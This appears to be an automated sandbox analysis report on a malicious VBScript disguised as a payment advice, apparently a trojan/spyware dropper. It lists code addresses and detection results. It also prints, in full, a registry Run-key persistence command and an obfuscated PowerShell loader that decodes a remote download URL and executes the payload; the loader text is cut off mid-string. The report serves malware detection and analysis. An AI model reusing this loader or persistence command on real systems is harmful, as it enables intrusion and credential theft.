              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252DF4C817_2_252DF4C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252D8CC017_2_252D8CC0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252DF4D817_2_252DF4D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252DDF2017_2_252DDF20
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252D0B2017_2_252D0B20
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252D0B3017_2_252D0B30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252DDF1117_2_252DDF11
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252DE36A17_2_252DE36A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252DE37817_2_252DE378
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252D1F9C17_2_252D1F9C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252DE7C017_2_252DE7C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252DD21817_2_252DD218
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252D966817_2_252D9668
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252DD66017_2_252DD660
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252DD67017_2_252DD670
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252DDAB917_2_252DDAB9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252DDAC817_2_252DDAC8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F772017_2_252F7720
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F7D7817_2_252F7D78
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F8B5817_2_252F8B58
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FF32917_2_252FF329
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F532817_2_252F5328
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FD33917_2_252FD339
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FF33817_2_252FF338
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FC10817_2_252FC108
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FA10717_2_252FA107
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F230017_2_252F2300
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F771F17_2_252F771F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FA11817_2_252FA118
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F936817_2_252F9368
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FE57817_2_252FE578
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F8B4917_2_252F8B49
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F0D4817_2_252F0D48
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FD34817_2_252FD348
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FB34817_2_252FB348
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F275817_2_252F2758
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FB35817_2_252FB358
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F935817_2_252F9358
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F275717_2_252F2757
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F65AF17_2_252F65AF
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FA5A817_2_252FA5A8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F2BA117_2_252F2BA1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F11A017_2_252F11A0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F41B817_2_252F41B8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FF7B817_2_252FF7B8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F2BB017_2_252F2BB0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FE58817_2_252FE588
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FC58817_2_252FC588
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F578017_2_252F5780
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FC59817_2_252FC598
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FA59817_2_252FA598
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F119017_2_252F1190
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F97EC17_2_252F97EC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F15E917_2_252F15E9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FB7E817_2_252FB7E8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F15F817_2_252F15F8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F97F817_2_252F97F8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F5BCA17_2_252F5BCA
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F41C817_2_252F41C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FF7C817_2_252FF7C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FD7C717_2_252FD7C7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F65C017_2_252F65C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F5BD817_2_252F5BD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FD7D817_2_252FD7D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FB7D717_2_252FB7D7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FCA2817_2_252FCA28
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FAA2717_2_252FAA27
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F462017_2_252F4620
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FFC2017_2_252FFC20
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F602017_2_252F6020
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FAA3817_2_252FAA38
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F603017_2_252F6030
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F6A0A17_2_252F6A0A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F300817_2_252F3008
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F300717_2_252F3007
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FEA0717_2_252FEA07
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F6A1817_2_252F6A18
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FEA1817_2_252FEA18
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FCA1717_2_252FCA17
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F001217_2_252F0012
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F461017_2_252F4610
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FFC1017_2_252FFC10
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FDC6817_2_252FDC68
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F4A6817_2_252F4A68
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FBC6817_2_252FBC68
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F346017_2_252F3460
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F6E6017_2_252F6E60
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F4A7817_2_252F4A78
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FBC7817_2_252FBC78
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F9C7817_2_252F9C78
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F6E7017_2_252F6E70
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F004017_2_252F0040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F1A4017_2_252F1A40
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FDC5817_2_252FDC58
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F1A5017_2_252F1A50
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F1EA817_2_252F1EA8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FEEA817_2_252FEEA8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FCEA817_2_252FCEA8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FCEB817_2_252FCEB8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F72B817_2_252F72B8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FAEB817_2_252FAEB8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F9C8817_2_252F9C88
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F048817_2_252F0488
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F049817_2_252F0498
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F1E9817_2_252F1E98
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FEE9817_2_252FEE98
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FE0E817_2_252FE0E8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FE0F817_2_252FE0F8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F08F017_2_252F08F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F22F017_2_252F22F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F72C817_2_252F72C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252FAEC817_2_252FAEC8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F4EC317_2_252F4EC3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F4ED017_2_252F4ED0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531402017_2_25314020
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531474017_2_25314740
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_25312DE017_2_25312DE0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531203017_2_25312030
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_25318A3017_2_25318A30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531473017_2_25314730
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531E03317_2_2531E033
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531723917_2_25317239
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531B53817_2_2531B538
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531CD2017_2_2531CD20
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_25318A2017_2_25318A20
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_25315F2817_2_25315F28
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531F82817_2_2531F828
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531B52817_2_2531B528
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531001117_2_25310011
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531171017_2_25311710
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531771017_2_25317710
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531CD1017_2_2531CD10
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_25315F1717_2_25315F17
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531A21817_2_2531A218
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531F81B17_2_2531F81B
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531201F17_2_2531201F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531370017_2_25313700
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531BA0017_2_2531BA00
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531170017_2_25311700
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_25314C0817_2_25314C08
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531E50817_2_2531E508
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531A20817_2_2531A208
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531400F17_2_2531400F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531327017_2_25313270
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531B07017_2_2531B070
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_25316D7017_2_25316D70
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531127217_2_25311272
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531DB7817_2_2531DB78
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531987E17_2_2531987E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531096017_2_25310960
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_25315A6017_2_25315A60
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531F36017_2_2531F360
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531326217_2_25313262
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531DB6717_2_2531DB67
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531856817_2_25318568
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531095117_2_25310951
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531295017_2_25312950
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_25319D5017_2_25319D50
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_25315A5017_2_25315A50
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531855917_2_25318559
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531C85817_2_2531C858
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531B05F17_2_2531B05F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531004017_2_25310040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531E04017_2_2531E040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_25319D4217_2_25319D42
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531724817_2_25317248
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531C84817_2_2531C848
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531F34F17_2_2531F34F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531D6B017_2_2531D6B0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_253124B017_2_253124B0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_253193B217_2_253193B2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_253168B817_2_253168B8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531BEB817_2_2531BEB8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531E9BF17_2_2531E9BF
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_25311BA017_2_25311BA0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_253180A017_2_253180A0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531D6A017_2_2531D6A0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531ABA817_2_2531ABA8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_253168A817_2_253168A8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_25313B9017_2_25313B90
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531C39017_2_2531C390
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_25311B9017_2_25311B90
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531559817_2_25315598
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531EE9817_2_2531EE98
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531AB9A17_2_2531AB9A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531128017_2_25311280
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_25316D8017_2_25316D80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_25313B8017_2_25313B80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531558717_2_25315587
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531988817_2_25319888
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531C38817_2_2531C388
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531EE8817_2_2531EE88
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531808F17_2_2531808F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_25310DF017_2_25310DF0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_253163F017_2_253163F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_253136F017_2_253136F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_25318EF217_2_25318EF2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531E4F917_2_2531E4F9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_25318EF817_2_25318EF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_25314BF817_2_25314BF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531A6E017_2_2531A6E0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_253163E017_2_253163E0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531D1E817_2_2531D1E8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531B9EF17_2_2531B9EF
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_253104D017_2_253104D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_253150D017_2_253150D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531E9D017_2_2531E9D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531A6D017_2_2531A6D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_25312DD217_2_25312DD2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531D1D717_2_2531D1D7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_25317BD817_2_25317BD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_25310DDF17_2_25310DDF
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_253150C117_2_253150C1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_253124C017_2_253124C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_253193C017_2_253193C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_253104C017_2_253104C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_2531BEC817_2_2531BEC8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_25317BC817_2_25317BC8
              Source: Payment_Advise.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Faderskabernes" /t REG_EXPAND_SZ /d "%Demiowl% -windowstyle 1 $Piddlingly=(gi 'HKCU:\Software\Underforstaaende\').GetValue('Udbetalingskortet');%Demiowl% ($Piddlingly)"
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6241
              Source: unknownProcess created: Commandline size = 6241
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6241Jump to behavior
              Source: amsi32_5352.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6652, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@15/13@6/5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Toldeftersyn.ManJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6668:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1116:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6012:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_faeorfv0.cbf.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_Advise.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6652
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5352
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Payment_Advise.vbsVirustotal: Detection: 27%
              Source: Payment_Advise.vbsReversingLabs: Detection: 18%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_Advise.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Klunketid; function Pachyhematous214($Rearrangdrr){$Blodprocenten=4;do{$Holderes+=$Rearrangdrr[$Blodprocenten];$Blodprocenten+=5;$Contakia=Format-List} until(!$Rearrangdrr[$Blodprocenten])$Holderes}function Verdensbermthedernes242($Pseudophilanthropic168){ .($Chiropractic) ($Pseudophilanthropic168)}$Signe=Pachyhematous214 ' rorN erveSnagt Po .B,asw';$Signe+=Pachyhematous214 ' m,aeBj,kBColoCRestlAntiIInd eBefrN anT';$Beetle=Pachyhematous214 'UnstMf,rfo reuzAm.eiLamblUligl assaTaka/';$Netstrmforsyningens=Pachyhematous214 ' fbaTGennlWatesUnmi1,ate2';$Disvisor='Knor[ Invn .lde SupT Avo.Ham.S orkE Hypr IdeVafbii nyCNet.eStyrPVileOSm gI onrN anTC tam Ud aKrafN,malAWastgCleaE IfrRNedg]Gall:phal:CogiSRappePtercBumfuAntarH emI.aksTvideyLibePServRBricoRe kTDyngo,ospcAgorOmysiLCyno=Sasc$,fhenForeEPolyt RivsMitht Ek.rA coMVa,bfko tOUnderAnfasAn ry NicnR neISyntnTilsgS phesocin Lets';$Beetle+=Pachyhematous214 ',amu5Outf.Skam0 Kon Aadr(Opi WskediC,ounFagldUncoo inawOstrsAdri blaNIndlT.ofa Ut.1Ops.0Part.Unda0Jt e;Regi UnwhWshipiSkolnKvge6Expa4aart;R su Noex Bl 6C ro4Con ;Ma.n .unirStenvAkse: S d1 Bek3Lix 4Pr v. P.r0Stoo)svar AnsvGYngleBaglcMusckTrano Inf/Snub2Grov0Pro 1Cler0Cons0 Ibs1Time0Vam 1u th PriFF rsiHerbr Fo,e PlefDipooRappxReth/Beha1Aest3Maxi4genz.Foli0';$Troppes=Pachyhematous214 'KhaluBoufs,eciedrplRR gi-TrysaProlGSed,eRundNMisst';$Imperativ=Pachyhematous214 'Flugh Hv tC ret DehpRejfsBlyh:Bryd/Semi/Vegeh orioPr,vmd scaIndiy SeteLunk-sco sLeiba,aemlMlleaPagem.ogfaFlogtSand.ce tcUgeno U,dmk gl/ nprtSparoSystpPerq/,oniC Su.o esklP,ptl UbeeOutbgSaaliLullabespnN.utt Rr,.BorepTa efAmalb';$afkalkningsanlgget=Pachyhematous214 'Sche>';$Chiropractic=Pachyhematous214 'DistIGorbEAureX';$Neuronic='Afrydningen';$Afgrdevalg219='\Toldeftersyn.Man';Verdensbermthedernes242 (Pachyhematous214 ' Exo$ KaigSydsL AgeOB rdbavalaDemoLbala:.yaeGFac LNobeY idfnAgly= .ar$HydrE SeinF,agV fo :Coawa e tpAeonp lunDUdstAmanvts,lua lis+Indi$Chefa,equFPaamg CreR .dmDF reE ,ukvDolkASamfLKumagHvid2n ni1Hete9');Verdensbermthedernes242 (Pachyhematous214 'Sed $D.pogS.dbLmuddO U obDeliASkoslR.pi:Hj,mt RehOlebeF Ne OTingr RepeMono=Unim$GameiJingm R np lysELu,er Lina o.at aceiDyppV Non.H,ves SpopHalclRillIexogtCalc( lgo$u unAVrelf,reskGigmADundLHaemKE penEsquiLydsN I sgSycosMetaANoteNUngdl RasgbatiG IsiEPseuTHepa)');Verdensbermthedernes242 (Pachyhematous214 $Disvisor);$Imperativ=$Tofore[0];$Optllingens=(Pachyhematous214 'Cann$ HanGInfalFomeo ndbPatcAT lslBo i:GelaB,omieMonoTJagtA SublVareiT.winGratGOr asSoffE St vStumNTranEBi e=GalaNsocrEUrosWsjus-lslaO S obAntijPhy eCroscafslt T i S ftSSultYGue.S theTSecrepennm op .Ido.$Civis,ormIOverGVelsn Pare');Verdensbermthedernes242 ($Optllingens);Verdensbermthedernes242 (Pachyhematous214 ' G n$ReplBPer,e Last O eaGamel orsiOmphn ,olgOr lsvir eVal v DvbnIndseVejr.RankHR.tiev caa D,dd aaeSubarHvorsBlac[ B,s$MacrTNeurrSupeoPr
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Klunketid; function Pachyhematous214($Rearrangdrr){$Blodprocenten=4;do{$Holderes+=$Rearrangdrr[$Blodprocenten];$Blodprocenten+=5;$Contakia=Format-List} until(!$Rearrangdrr[$Blodprocenten])$Holderes}function Verdensbermthedernes242($Pseudophilanthropic168){ .($Chiropractic) ($Pseudophilanthropic168)}$Signe=Pachyhematous214 ' rorN erveSnagt Po .B,asw';$Signe+=Pachyhematous214 ' m,aeBj,kBColoCRestlAntiIInd eBefrN anT';$Beetle=Pachyhematous214 'UnstMf,rfo reuzAm.eiLamblUligl assaTaka/';$Netstrmforsyningens=Pachyhematous214 ' fbaTGennlWatesUnmi1,ate2';$Disvisor='Knor[ Invn .lde SupT Avo.Ham.S orkE Hypr IdeVafbii nyCNet.eStyrPVileOSm gI onrN anTC tam Ud aKrafN,malAWastgCleaE IfrRNedg]Gall:phal:CogiSRappePtercBumfuAntarH emI.aksTvideyLibePServRBricoRe kTDyngo,ospcAgorOmysiLCyno=Sasc$,fhenForeEPolyt RivsMitht Ek.rA coMVa,bfko tOUnderAnfasAn ry NicnR neISyntnTilsgS phesocin Lets';$Beetle+=Pachyhematous214 ',amu5Outf.Skam0 Kon Aadr(Opi WskediC,ounFagldUncoo inawOstrsAdri blaNIndlT.ofa Ut.1Ops.0Part.Unda0Jt e;Regi UnwhWshipiSkolnKvge6Expa4aart;R su Noex Bl 6C ro4Con ;Ma.n .unirStenvAkse: S d1 Bek3Lix 4Pr v. P.r0Stoo)svar AnsvGYngleBaglcMusckTrano Inf/Snub2Grov0Pro 1Cler0Cons0 Ibs1Time0Vam 1u th PriFF rsiHerbr 